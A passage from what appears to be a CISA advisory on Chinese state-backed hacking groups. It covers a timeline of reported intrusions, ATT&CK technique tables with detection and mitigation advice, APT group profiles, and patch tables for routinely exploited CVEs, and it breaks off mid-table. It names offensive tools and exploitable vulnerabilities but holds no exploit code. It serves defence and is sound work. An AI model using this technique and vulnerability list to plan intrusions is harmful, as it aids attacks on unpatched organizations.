Their targets also include western companies with operations inside China.\n\nPublic reporting that associates Chinese actors with a range of high-profile attacks and offensive cyber activity includes:\n\n * **February 2013 \u2013 Cyber Threat Intelligence Researchers Link Advanced Persistent Threat (APT) 1 to China:** a comprehensive report publicly exposed APT1 as part of China\u2019s military cyber operations and a multi-year effort that exfiltrated IP from roughly 141 companies spanning 20 major industries.[[4](<https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf>)] APT1 established access to the victims\u2019 networks and methodically exfiltrated IP across a large range of industries identified in China\u2019s 12th 5-Year Plan. A year later, the DOJ indicted Chinese cyber threat actors assigned to PLA Unit 61398 for the first time (also highlighted in the report).[[5](<https://www.justice.gov/opa/pr/us-charges-five-chinese-military-hackers-cyber-espionage-against-us-corporations-and-labor>)]\n * **April 2017 \u2013 Chinese APTs Targeting IP in 12 Countries:** CISA announced Chinese state-backed APTs carried out a multi-year campaign of cyber-enabled IP theft that targeted global technology service providers and their customers. 
The threat actors leveraged stolen administrative credentials (local and domain) and placed sophisticated malware on critical systems in an effort to steal the IP and sensitive data of companies located in at least 12 countries.[[6](<https://us-cert.cisa.gov/ncas/alerts/TA17-117A>)]\n * **December 2018 \u2013 Chinese Cyber Threat Actors Indicted for Compromising Managed Service Providers (MSPs):** DOJ indicted two Chinese cyber threat actors believed to be associated with APT10, who targeted MSPs and their large customer base through phishing and spearphishing campaigns aimed at exfiltrating sensitive business data and, possibly, PII.[[7](<https://www.justice.gov/opa/speech/deputy-attorney-general-rod-j-rosenstein-announces-charges-against-chinese-hackers>)] CISA also briefed stakeholders on Chinese APT groups who targeted MSPs and their customers to steal data and further operationalize commercial and economic espionage.[[8](<https://us-cert.cisa.gov/sites/default/files/publications/Chinese-Cyber-Activity-Targeting-Managed-Service-Providers.pdf>)]\n * **February 2020 \u2013 China\u2019s Military Indicted for 2017 Equifax Hack:** DOJ indicted members of China\u2019s PLA for stealing large amounts of PII and IP. The Chinese cyber threat actors exploited a vulnerability in the company\u2019s dispute resolution website to enter the network, conduct reconnaissance, upload malware, and steal credentials to extract the targeted data. The breach impacted roughly half of all American citizens and stole Equifax\u2019s trade secrets.[[9](<https://www.justice.gov/opa/speech/attorney-general-william-p-barr-announces-indictment-four-members-china-s-military>)]\n * **May 2020 \u2013 China Targets COVID-19 Research Organizations:** the Federal Bureau of Investigation (FBI) and CISA reported the targeting and compromise of U.S. 
organizations conducting COVID-19-related research by cyber actors affiliated with China.[[10](<https://www.cisa.gov/news/2020/05/13/fbi-and-cisa-warn-against-chinese-targeting-covid-19-research-organizations>)] Large-scale password spraying campaigns were a commonly observed tactic in illicitly obtaining IP related to vaccines, treatments, and testing from networks and personnel affiliated with COVID-19-related research.[[11](<https://us-cert.cisa.gov/ncas/alerts/AA20126A>)],[[12](<https://us-cert.cisa.gov/ncas/current-activity/2020/08/03/chinese-malicious-cyber-activity%20>)]\n\n#### Common TTPs of Publicly Known Chinese Threat Actors\n\nThe section below provides common, publicly known, TTPs employed by Chinese threat actors, which map to the MITRE ATT&CK framework. Where possible, the tables include actions for detection and mitigation. This section is not exhaustive and does not detail all TTPs or detection and mitigation actions. \n\n#### PRE-ATT&CK TTPs\n\nChinese threat actors commonly use the techniques listed in table 1 to achieve reconnaissance (_Technical Information Gathering_ [[TA0015](<https://attack.mitre.org/tactics/TA0015/>)]), staging (_Stage Capabilities_ [[TA0026](<https://attack.mitre.org/tactics/TA0026/>)]), and testing (_Test Capabilities_ [[TA0025](<https://attack.mitre.org/tactics/TA0025/>)]) before executing an attack. 
PRE-ATT&CK techniques can be difficult to detect and mitigate, however, defenders should be aware of the use of these techniques.\n\n_Table 1: Chinese threat actor PRE-ATT&CK techniques_\n\n**Technique** | **Description** \n---|--- \n_Acquire and/or Use 3rd Party Software Services_ [[T1330](<https://attack.mitre.org/techniques/T1330/>)] | Staging and launching attacks from software as a service solutions that cannot be easily tied back to the APT \n_Compromise 3rd Party Infrastructure to Support Delivery_ [[T1334](<https://attack.mitre.org/techniques/T1334/>)] | Compromising infrastructure owned by other parties to facilitate attacks (instead of directly purchasing infrastructure) \n_Domain Registration Hijacking_ [[T1326](<https://attack.mitre.org/techniques/T1326/>)] | Changing the registration of a domain name without the permission of its original registrant and then using the legitimate domain as a launch point for malicious purposes \n_Acquire Open-Source Intelligence (OSINT) Data Sets and Information_ [[T1247](<https://attack.mitre.org/techniques/T1247/>)] | Gathering data and information from publicly available sources, including public-facing websites of the target organization \n_Conduct Active Scanning _[[T1254](<https://attack.mitre.org/techniques/T1254/>)] | Gathering information on target systems by scanning the systems for vulnerabilities. 
Adversaries are likely using tools such as Shodan to identify vulnerable devices connected to the internet \n_Analyze Architecture and Configuration Posture _[[T1288](<https://attack.mitre.org/techniques/T1288/>)] | Analyzing technical scan results to identify architectural flaws, misconfigurations, or improper security controls in victim networks \n_Upload, Install, and Configure Software/Tools_ [[T1362](<https://attack.mitre.org/techniques/T1362>)] | Placing malware on systems illegitimately for use during later stages of an attack to facilitate exploitability and gain remote access \n \n#### Enterprise ATT&CK TTPs\n\nChinese threat actors often employ publicly known TTPs against enterprise networks. To orchestrate attacks, they use commonly implemented security testing tools and frameworks, such as:\n\n * Cobalt Strike and Beacon\n * Mimikatz\n * PoisonIvy\n * PowerShell Empire\n * China Chopper Web Shell\n\nTable 2 lists common, publicly known, TTPs used by Chinese threat actors against enterprise networks and provides options for detection and mitigation based on the MITRE ATT&CK framework.\n\n_Table 2: Common Chinese threat actor techniques, detection, and mitigation_\n\n**Technique / Sub-Technique** | **Detection** | **Mitigation** \n---|---|--- \n_Obfuscated Files or Information _[[T1027](<https://attack.mitre.org/techniques/T1027/>)] | \n\n * Detect obfuscation by analyzing signatures of modified files.\n * Flag common syntax used in obfuscation.\n| \n\n * Use antivirus/antimalware software to analyze commands after processing. 
\n_Phishing: Spearphishing Attachment _[[T1566.001](<https://attack.mitre.org/techniques/T1566/001/>)] and _Spearphishing Link _[[T1566.002](<https://attack.mitre.org/techniques/T1566/002/>)] | \n\n * Use network intrusion detection systems (NIDS) and email gateways to detect suspicious attachments in email entering the network.\n * Use detonation chambers to inspect email attachments in isolated environments.\n| \n\n * Quarantine suspicious files with antivirus solutions.\n * Use network intrusion prevention systems to scan and remove malicious email attachments.\n * Train users to identify phishing emails and notify IT. \n_System Network Configuration Discovery_ [[T1016](<https://attack.mitre.org/techniques/T1016/>)] | \n\n * Monitor for processes and command-line arguments that could be used by an adversary to gather system and network information.\n| \n\n * This technique is difficult to mitigate with preventative controls; organizations should focus on detecting and responding to malicious activity to limit impact. \n_Command and Scripting Interpreter: Windows Command Shell _[[T1059.003](<https://attack.mitre.org/techniques/T1059/003/>)] | \n\n * Identify normal scripting behavior on the system then monitor processes and command-line arguments for suspicious script execution behavior.\n| \n\n * Only permit execution of signed scripts.\n * Disable any unused shells or interpreters. \n \n_User Execution: Malicious File _[[T1204.002](<https://attack.mitre.org/techniques/T1204/002/>)] | \n\n * Monitor execution of command-line arguments for applications (including compression applications) that may be used by an adversary to execute a user interaction.\n * Set antivirus software to detect malicious documents and files downloaded and installed on endpoints.\n| \n\n * Use execution prevention to prevent the running of executables disguised as other files.\n * Train users to identify phishing attacks and other malicious events that may require user interaction. 
\n_Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder _[[T1547.001](<https://attack.mitre.org/techniques/T1547/001/>)] | \n\n * Monitor the start folder for additions and changes.\n * Monitor registry for changes to run keys that do not correlate to known patches or software updates.\n| \n\n * This technique is difficult to mitigate with preventative controls; organizations should focus on detecting and responding to malicious activity to limit impact. \n_Command and Scripting Interpreter: PowerShell _[[T1059.001](<https://attack.mitre.org/techniques/T1059/001/>)] | \n\n * Enable PowerShell logging.\n * Monitor for changes in PowerShell execution policy as a method of identifying malicious use of PowerShell.\n * Monitor for PowerShell execution generally in environments where PowerShell is not typically used.\n| \n\n * Set PowerShell execution policy to execute only signed scripts.\n * Disable PowerShell if not needed by the system.\n * Disable WinRM service to help prevent use of PowerShell for remote execution.\n * Restrict PowerShell execution policy to administrators. \n_Hijack Execution Flow: DLL Side-Loading _[[T1574.002](<https://attack.mitre.org/techniques/T1574/002/>)] | \n\n * Track Dynamic Link Library (DLL) metadata, and compare DLLs that are loaded at process execution time against previous executions to detect usual differences unrelated to patching.\n| \n\n * Use the program `sxstrace.exe` to check manifest files for side-loading vulnerabilities in software.\n * Update software regularly including patches for DLL side-loading vulnerabilities. 
\n_Ingress Tool Transfer_ [[T1105](<https://attack.mitre.org/techniques/T1105/>)] | \n\n * Monitor for unexpected file creation or files transfer into the network from external systems, which may be indicative of attackers staging tools in the compromised environment.\n * Analyze network traffic for unusual data flows (i.e., a client sending much more data than it receives from a server).\n| \n\n * Use network intrusion detection and prevention systems to identify traffic for specific adversary malware or unusual data transfer over protocols such as File Transfer Protocol. \n_Remote System Discovery_ [[T1018](<https://attack.mitre.org/techniques/T1018/>)] | \n\n * Monitor processes and command-line arguments for actions that could be taken to gather system and network information.\n * In cloud environments, usage of commands and application program interfaces (APIs) to request information about remote systems combined with additional unexpected commands may be a sign of malicious use.\n| \n\n * This technique is difficult to mitigate with preventative controls; organizations should focus on detecting and responding to malicious activity to limit impact. \n_Software Deployment Tools_ [[T1072](<https://attack.mitre.org/techniques/T1072/>)] | \n\n * Identify the typical use pattern of third-party deployment software, then monitor for irregular deployment activity.\n| \n\n * Isolate critical network systems access using group policies, multi-factor authentication (MFA), and firewalls.\n * Patch deployment systems regularly.\n * Use unique and limited credentials for access to deployment systems. \n_Brute Force: Password Spraying_ [[T1110.003](<https://attack.mitre.org/techniques/T1110/003/>)] | \n\n * Monitor logs for failed authentication attempts to valid accounts.\n| \n\n * Use MFA.\n * Set account lockout policies after a certain number of failed login attempts. 
\n_Network Service Scanning_ [[T1046](<https://attack.mitre.org/techniques/T1046/>)] | \n\n * Use network intrusion detection systems (NIDS) to identify scanning activity.\n| \n\n * Close unnecessary ports and services.\n * Segment the network to protect critical servers and devices. \n_Email Collection_ [[T1114](<https://attack.mitre.org/techniques/T1114/>)] | \n\n * Monitor processes and command-line arguments for actions that could be taken to gather local email files.\n| \n\n * Encrypt sensitive emails.\n * Audit auto-forwarding email rules regularly.\n * Use MFA for public-facing webmail servers. \n_Proxy: External Proxy_ [[T1090.002](<https://attack.mitre.org/techniques/T1090/002/>)] | \n\n * Analyze network data for uncommon data flows, such as a client sending significantly more data than it receives from an external server.\n| \n\n * Use NIDS and prevention systems with network signatures to identify traffic for specific adversary malware. \n_Drive-by Compromise_ [[T1189](<https://attack.mitre.org/techniques/T1189/>)] | \n\n * Use firewalls and proxies to inspect URLs for known-bad domains or parameters.\n * Monitor NIDS alerts to detect malicious scripts, and monitor endpoints for abnormal behavior.\n| \n\n * Isolate and sandbox impacted systems and applications to restrict the spread of malware.\n * Use security applications to identify malicious behavior during exploitation.\n * Restrict web-based content through ad blockers and script-blocking extensions. \n_Server Software Component: Web Shell_ [[T1505.003](<https://attack.mitre.org/techniques/T1505/003/>)] | \n\n * Analyze authentication logs, file changes, and netflow (including enclave-internal netflow), and use process monitoring to discover anomalous activity such as a web server process spawning a command interpreter.\n| \n\n * Patch vulnerabilities in internet-facing applications.\n * Use file integrity monitoring to identify changes to files in web-accessible directories.\n * Apply least privilege to the web-accessible directory so that the web server account cannot write to it. 
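The "client sends much more than it receives" indicator from the Ingress Tool Transfer and External Proxy rows above, as a worked example over flow records (added here; not code from the CISA alert). The flow tuples, the internal address ranges, and the backup allowlist are constructed assumptions of this example, and the ratio and volume thresholds are starting points to tune.

```python
"""Flag internal clients that send far more bytes to an external peer than
they receive, the 'uncommon data flow' indicator the rows above give for
Ingress Tool Transfer and External Proxy.

Added example, not from the CISA alert. Flow records are constructed inline
in a simplified NetFlow-like form; field names, address ranges and the
allowlist are this example's assumptions."""
import ipaddress
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    src: str        # initiating host
    dst: str        # responder
    dport: int
    bytes_out: int  # bytes src -> dst
    bytes_in: int   # bytes dst -> src


# Assumption: these ranges are the organization's internal address space.
INTERNAL = [ipaddress.ip_network("10.0.0.0/8"), ipaddress.ip_network("192.168.0.0/16")]


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL)


def asymmetric_peers(flows, ratio=5.0, min_bytes=1_000_000, allowlist=frozenset()):
    """Aggregate client -> external-peer traffic and return (client, peer, sent,
    received, ratio) for pairs where sent volume is at least `ratio` times the
    received volume and exceeds `min_bytes`. Known upload destinations
    (backup, cloud storage) go in `allowlist` to cut expected noise."""
    totals = defaultdict(lambda: [0, 0])
    for f in flows:
        if is_internal(f.src) and not is_internal(f.dst) and f.dst not in allowlist:
            totals[(f.src, f.dst)][0] += f.bytes_out
            totals[(f.src, f.dst)][1] += f.bytes_in
    hits = []
    for (client, peer), (sent, recv) in totals.items():
        if sent >= min_bytes and sent >= ratio * max(recv, 1):
            hits.append((client, peer, sent, recv, round(sent / max(recv, 1), 1)))
    return sorted(hits, key=lambda h: h[2], reverse=True)


# Constructed sample: ordinary browsing, an internal-only SMB transfer, a known
# backup upload, and one host pushing 30 MB to an external host on 443 across
# four connections while getting almost nothing back.
SAMPLE_FLOWS = [
    Flow("10.0.1.20", "93.184.216.34", 443, 20_000, 800_000),
    Flow("10.0.1.20", "93.184.216.34", 443, 15_000, 650_000),
    Flow("10.0.1.20", "10.0.2.5", 445, 5_000_000, 20_000),
    Flow("10.0.1.70", "198.51.100.200", 443, 20_000_000, 50_000),
] + [Flow("10.0.1.55", "203.0.113.44", 443, 7_500_000, 100_000) for _ in range(4)]
BACKUP_PEERS = frozenset({"198.51.100.200"})


def run_example():
    return asymmetric_peers(SAMPLE_FLOWS, allowlist=BACKUP_PEERS)


if __name__ == "__main__":
    for client, peer, sent, recv, r in run_example():
        print(f"{client} -> {peer}: sent {sent} B, received {recv} B, ratio {r}x")
```

Aggregating per client/peer pair rather than per flow matters because a proxy or staging channel is usually many modest connections, none of which looks alarming alone. Without the allowlist the backup host is reported too, which is the expected false positive this heuristic produces on legitimate bulk uploads.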
\n_Application Layer Protocol: File Transfer Protocols_ [[T1071.002](<https://attack.mitre.org/techniques/T1071/002/>)] and _DNS_ [[T1071.004](<https://attack.mitre.org/techniques/T1071/004/>)] | \n\n * Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server).\n * Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.\n| \n\n * Use NIDS and NIPS with network signatures to identify traffic for specific adversary malware. \n \n#### Additional APT Activity\n\nThe TTPs listed above have been used repeatedly across the spectrum of Chinese threat actors. The mitigations referenced in this alert can help reduce vulnerability to these TTPs; however, defenders should also maintain heightened awareness of threat actors that are more innovative in their approach, which makes compromise harder to detect and respond to. Publicly reported examples [[13](<https://www.fireeye.com/current-threats/apt-groups.html>)] include:\n\n * **APT3** (known as UPS Team) is known for deploying zero-day attacks that target Internet Explorer, Firefox, and Adobe Flash Player. The group’s custom implants and changing Command and Control (C2) infrastructure make them difficult to track. 
APT3 exploits have used Rivest Cipher 4 (RC4) encryption for their communications and have bypassed address space layout randomization (ASLR) and Data Execution Prevention (DEP) using Return Oriented Programming (ROP) chains. [[14](<https://attack.mitre.org/groups/G0022/>)]\n * **APT10** (known as MenuPass Group) has established access to victim networks through compromised service providers, making it difficult for network defenders to identify the malicious traffic.\n * **APT19** (known as Codoso and Deep Panda) is known for developing custom Rich Text Format (RTF) and macro-enabled Microsoft Office documents for both implants and payloads. The group has backdoored software, such as software serial generators, and makes skilled use of PowerShell for C2 over Hypertext Transfer Protocol (HTTP) and HTTP Secure (HTTPS). [[15](<https://attack.mitre.org/groups/G0073/>)]\n * **APT40** (known as Leviathan) has successfully targeted external infrastructure, including internet-facing routers and virtual private networks (VPNs).\n * **APT41** (known as Double Dragon) has exploited vulnerabilities in Citrix NetScaler/ADC, Cisco routers, and Zoho ManageEngine Desktop Central to compromise victims. [[16](<https://attack.mitre.org/groups/G0096/>)]\n\n### Mitigations\n\n### Recommended Actions\n\nThe following list provides actionable technical recommendations for IT security professionals to reduce their organization’s overall vulnerability. These recommendations are not exhaustive; rather, they focus on the actions that will greatly reduce stakeholders’ attack surface.\n\n 1. **Patch systems and equipment promptly and diligently.** Establishing and consistently maintaining a thorough patching cycle continues to be the best defense against adversary TTPs. Focus on patching critical and high vulnerabilities that allow remote code execution or denial of service on externally facing (i.e., internet-exposed) equipment. 
Certain vulnerabilities, including CVE-2012-0158 in Microsoft products [[17](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>)], CVE-2019-19781 in Citrix devices [[18](<https://us-cert.cisa.gov/ncas/alerts/aa20-020a>)], and CVE-2020-5902 in the BIG-IP Traffic Management User Interface (TMUI) [[19](<https://us-cert.cisa.gov/ncas/current-activity/2020/07/04/f5-releases-security-advisory-big-ip-tmui-rce-vulnerability-cve>)], have presented APTs with prime targets for gaining initial access. Chinese APTs often use existing exploit code to target routinely exploited vulnerabilities [[20](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>)], an opportunistic approach that requires limited resources. See Table 3 for patch information on CVEs that have been routinely exploited by Chinese APTs. See Table 4 for patch information on vulnerabilities that the National Security Agency (NSA) has stated are actively used by Chinese state-sponsored cyber actors.\n\n_Table 3: Patch information for vulnerabilities routinely exploited by Chinese APT actors_\n\n**Vulnerability** | **Vulnerable Products** | **Patch Information** \n---|---|--- \n[CVE-2012-0158](<https://nvd.nist.gov/vuln/detail/CVE-2012-0158>) | \n\nMicrosoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3; SQL Server 2000 SP4, 2005 SP4, and 2008 SP2, SP3, and R2; BizTalk Server 2002 SP1; Commerce Server 2002 SP4, 2007 SP2, and 2009 Gold and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; and Visual Basic 6.0\n\n| \n\n * [Microsoft Security Bulletin MS12-027: Vulnerability in Windows Common Controls Could Allow Remote Code Execution](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-027>) \n[CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) | \n\n * BIG-IP devices (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO, CGNAT)\n| \n\n * [F5 Security Advisory: K52145254: TMUI RCE vulnerability 
CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>) \n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) | \n\n * Citrix Application Delivery Controller\n * Citrix Gateway\n * Citrix SDWAN WANOP\n\n| \n\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>)\n * [Citrix blog post: security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>)\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>)\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway version 10.5](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>) \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) | \n\n * Pulse Connect Secure 9.0R1 - 9.0R3.3, 8.3R1 - 8.3R7, 8.2R1 - 8.2R12, 8.1R1 - 8.1R15\n * Pulse Policy Secure 9.0R1 - 9.0R3.1, 5.4R1 - 5.4R7, 5.3R1 - 5.3R12, 5.2R1 - 5.2R12, 5.1R1 - 5.1R15\n| \n\n * [Pulse Secure Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>) \n[CVE-2019-16920](<https://nvd.nist.gov/vuln/detail/CVE-2019-16920>) | \n\n * D-Link products DIR-655C, DIR-866L, DIR-652, DHP-1565, DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825\n| \n\n * [D-Link Security Advisory: DAP-1533 Rv Ax, DGL-5500 Rv Ax, DHP-1565 Rv Ax, DIR-130 Rv Ax, DIR-330 Rv Ax, DIR-615 Rv Ix, (non-US) DIR-652 Rv Bx, DIR-655 Rv Cx, DIR-825 Rv Cx, DIR-835 Rv Ax, DIR-855L Rv Ax, (non-US) DIR-862 Rv Ax, DIR-866L Rv Ax :: CVE-2019-16920 :: 
Unauthenticated Remote Code Execution (RCE) Vulnerability](<https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10124>) \n[CVE-2019-16278](<https://nvd.nist.gov/vuln/detail/CVE-2019-16278>) | \n\n * Nostromo 1.9.6 and below\n| \n\n * [Nostromo 1.9.6 Directory Traversal/ Remote Command Execution](<https://packetstormsecurity.com/files/155045/Nostromo-1.9.6-Directory-Traversal-Remote-Command-Execution.html>)\n * [Nostromo 1.9.6 Remote Code Execution](<https://packetstormsecurity.com/files/155802/nostromo-1.9.6-Remote-Code-Execution.html>) \n \n[CVE-2019-1652](<https://nvd.nist.gov/vuln/detail/CVE-2019-1652>) | \n\n * Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers\n| \n\n * [Cisco Security Advisory: Cisco Small Business RV320 and RV325 Routers Command Injection Vulnerability](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject>) \n[CVE-2019-1653](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) | \n\n * Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers\n| \n\n * [Cisco Security Advisory: Cisco Small Business RV320 and RV325 Routers Information Disclosure Vulnerability](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info>) \n[CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>) | \n\n * Zoho ManageEngine Desktop Central before 10.0.474\n| \n\n * [ManageEngine Desktop Central remote code execution vulnerability (CVE-2020-10189)](<https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html>) \n \n_Table 4: Patch information for NSA listed vulnerabilities used by Chinese state-sponsored cyber actors [[21](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>)]_\n\n**Vulnerability** | **Vulnerable Products** | **Patch Information** \n---|---|--- \n[CVE-2020-8193](<https://nvd.nist.gov/vuln/detail/CVE-2020-8193>) | \n\n 
* Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18\n * Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7\n| \n\n * [Citrix Security Bulletin CTX276688](<https://support.citrix.com/article/CTX276688>) \n[CVE-2020-8195](<https://nvd.nist.gov/vuln/detail/CVE-2020-8195>) | \n\n * Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18\n * Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7\n| \n\n * [Citrix Security Bulletin CTX276688](<https://support.citrix.com/article/CTX276688>) \n[CVE-2020-8196](<https://nvd.nist.gov/vuln/detail/CVE-2020-8196>) | \n\n * Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18\n * Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7\n\n| \n\n * [Citrix Security Bulletin CTX276688](<https://support.citrix.com/article/CTX276688>) \n[CVE-2019-0708](<https://nvd.nist.gov/vuln/detail/CVE-2019-0708>) | \n\n * Windows 7 for 32-bit Systems Service Pack 1\n * Windows 7 for x64-based Systems Service Pack 1\n * Windows Server 2008 for 32-bit Systems Service Pack 2\n * Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)\n * Windows Server 2008 for Itanium-Based Systems Service Pack 2\n * Windows Server 2008 for x64-based Systems Service Pack 2\n * Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)\n * Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)\n| \n\n * [Microsoft Security Advisory for CVE-2019-0708](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708>) \n[CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>) | \n\n * MobileIron Core & Connector versions 10.3.0.3 and 
earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0\n * Sentry versions 9.7.2 and earlier, and 9.8.0;\n * Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier\n| \n\n * [MobileIron Blog: MobileIron Security Updates Available](<https://www.mobileiron.com/en/blog/mobileiron-security-updates-available>) \n[CVE-2020-1350](<https://nvd.nist.gov/vuln/detail/CVE-2020-1350>) | \n\n * Windows Server 2008 for 32-bit Systems Service Pack 2\n * Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)\n * Windows Server 2008 for x64-based Systems Service Pack 2\n * Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)\n * Windows Server 2012\n * Windows Server 2012 (Server Core installation)\n * Windows Server 2012 R2\n * Windows Server 2012 R2 (Server Core installation)\n * Windows Server 2016\n * Windows Server 2016 (Server Core installation)\n * Windows Server 2019\n * Windows Server 2019 (Server Core installation)\n * Windows Server, version 1903 (Server Core installation)\n * Windows Server, version 1909 (Server Core installation)\n * Windows Server, version 2004 (Server Core installation)\n| \n\n * [Microsoft Security Advisory for CVE-2020-1350](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1350>) \n \n[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) | \n\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)\n * Windows Server 2012\n * Windows Server 2012 (Server Core installation)\n * Windows Server 2012 R2\n * Windows Server 2016\n * Windows Server 2019\n * Windows Server 2019 (Server Core installation)\n * Windows Server, version 1903 (Server Core installation)\n * Windows 
Server, version 1909 (Server Core installation)\n * Windows Server, version 2004 (Server Core installation)\n| \n\n * [Microsoft Security Advisory for CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) \n \n[CVE-2020-1040](<https://nvd.nist.gov/vuln/detail/CVE-2020-1040>) | \n\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)\n * Windows Server 2012\n * Windows Server 2012 (Server Core installation)\n * Windows Server 2012 R2\n * Windows Server 2012 R2 (Server Core installation)\n * Windows Server 2016\n * Windows Server 2016 (Server Core installation)\n| \n\n * [Microsoft Security Advisory for CVE-2020-1040](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1040>) \n[CVE-2018-6789](<https://nvd.nist.gov/vuln/detail/CVE-2018-6789>) | \n\n * Exim before 4.90.1\n| \n\n * [Exim page for CVE-2018-6789](<https://exim.org/static/doc/security/CVE-2018-6789.txt>)\n * [Exim patch information for CVE-2018-6789](<https://git.exim.org/exim.git/commit/cf3cd306062a08969c41a1cdd32c6855f1abecf1>) \n[CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) | \n\n * Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30\n * Microsoft Exchange Server 2013 Cumulative Update 23\n * Microsoft Exchange Server 2016 Cumulative Update 14\n * Microsoft Exchange Server 2016 Cumulative Update 15\n * Microsoft Exchange Server 2019 Cumulative Update 3\n * Microsoft Exchange Server 2019 Cumulative Update 4\n| \n\n * [Microsoft Security Advisory for CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>) \n[CVE-2018-4939](<https://nvd.nist.gov/vuln/detail/CVE-2018-4939>) | \n\n * ColdFusion Update 5 and earlier versions\n * ColdFusion 11 Update 13 and earlier versions\n| \n\n * [Adobe Security Bulletin 
